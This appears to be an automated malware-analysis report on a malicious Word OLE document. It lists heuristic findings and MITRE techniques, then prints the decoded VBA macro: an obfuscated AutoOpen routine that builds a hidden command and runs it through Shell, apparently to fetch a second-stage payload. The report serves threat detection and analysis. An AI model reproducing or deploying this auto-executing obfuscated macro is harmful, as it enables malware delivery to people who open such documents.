MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a VBA macro with an AutoOpen subroutine. This macro attempts to execute a command using the Shell function with a heavily obfuscated string, likely to download and run a second-stage payload. The presence of an AutoOpen macro and the obfuscated execution attempt strongly suggest a malicious intent typical of macro-based malware delivery.
Heuristics 5
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 93,268 bytes but its declared streams total only 36,399 bytes — 56,869 bytes (61%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1585 bytes |
SHA-256: f4d2dcabd1fb4b96acdb9c7b475f921e8bd9f1a94c07595de3c2896bd52fbe4c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ONFNUlnU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim cMiScP(2)
cMiScP(0) = MidB("wCKcT", 200, 533)
cMiScP(1) = MidB("tvMcVmI", 534, 123)
Dim bmidK(1)
bmidK(0) = Right("kVjzD", 478)
Dim SiaZa(2)
SiaZa(0) = Right("NuGkPriA", 530)
SiaZa(1) = Mid("nljkajo", 587, 255)
Dim kUBrwI(1)
kUBrwI(0) = MidB("pBrvcqT", 708, 460)
Dim frokMi(1)
frokMi(0) = Left("zXKMk", 651)
lBhjuWFOwiw (KeyString(3 + 6 + 2 + 0 + 56) + UsodooiQdP + PNERi + iphCaorHWSr + YGNaQkDdLj + vzJXHFNkmsC)
Dim GRPAdh(1)
GRPAdh(0) = MidB("dSAJijEa", 649, 998)
Dim QGQimm(1)
QGQimm(0) = Right("qNzWWtkH", 902)
Dim zYwllh(1)
zYwllh(0) = Left("mAOUF", 798)
End Sub
Function lBhjuWFOwiw(FciQRYwYOP As String)
Dim cIfCJf(2)
cIfCJf(0) = Right("TbvvOwu", 382)
cIfCJf(1) = MidB("PIEEkBE", 347, 308)
Dim VdPcih(1)
VdPcih(0) = MidB("TzhiR", 364, 926)
Dim ECkTEC(1)
ECkTEC(0) = MidB("dhcOlpz", 923, 33)
Dim raQqcr(2)
raQqcr(0) = MidB("PRmwB", 430, 292)
raQqcr(1) = Mid("ozQjV", 144, 718)
Dim tVCNDB(1)
tVCNDB(0) = Left("rHAbE", 250)
Shell@ FciQRYwYOP, CInt(msoBarTypeNormal)
Dim njQZGj(1)
njQZGj(0) = Left("HTiRjP", 177)
Dim INviBd(2)
INviBd(0) = MidB("bEzYfL", 213, 894)
INviBd(1) = Left("FlaFAoc", 49)
Dim RRfIo(1)
RRfIo(0) = MidB("loBAQ", 872, 662)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.